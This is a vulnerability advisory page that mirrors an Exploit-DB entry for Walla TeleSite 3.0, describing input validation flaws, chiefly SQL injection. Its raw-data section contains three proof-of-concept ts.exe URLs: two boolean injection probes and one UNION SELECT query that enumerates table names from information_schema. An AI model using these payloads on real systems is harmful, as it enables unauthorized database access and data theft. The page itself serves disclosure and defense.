header-logo
Suggest Exploit
vendor:
Walla TeleSite
by:
7.5
CVSS
HIGH
Input Validation
20
CWE
Product Name: Walla TeleSite
Affected Version From: 3
Affected Version To: Earlier versions
Patch Exists: NO
Related CWE:
CPE: a:walla_telesite:walla_telesite:3.0
Metasploit:
Other Scripts:
Platforms Tested:

Input Validation Vulnerabilities in Walla TeleSite

Walla TeleSite is prone to multiple input validation vulnerabilities. These vulnerabilities occur due to a lack of proper sanitization of user-supplied input. The vulnerabilities include information and path disclosure, file enumeration, SQL injection, and cross-site scripting attacks within the context of the victim's Web browser and the affected computer. Other attacks may also be possible.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, keeping the software up to date with the latest patches and security updates is advised.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15419/info
  
Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.
  
Walla TeleSite is prone to information and path disclosure, file enumeration, SQL injection, and cross-site scripting attacks within the context of the victim's Web browser and the affected computer.
  
Other attacks are also possible.
  
Walla Telesite version 3.0 is affected; earlier versions are also affected. 

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2

http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,
null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--

Navigation

Suggest Exploit

Services By CQR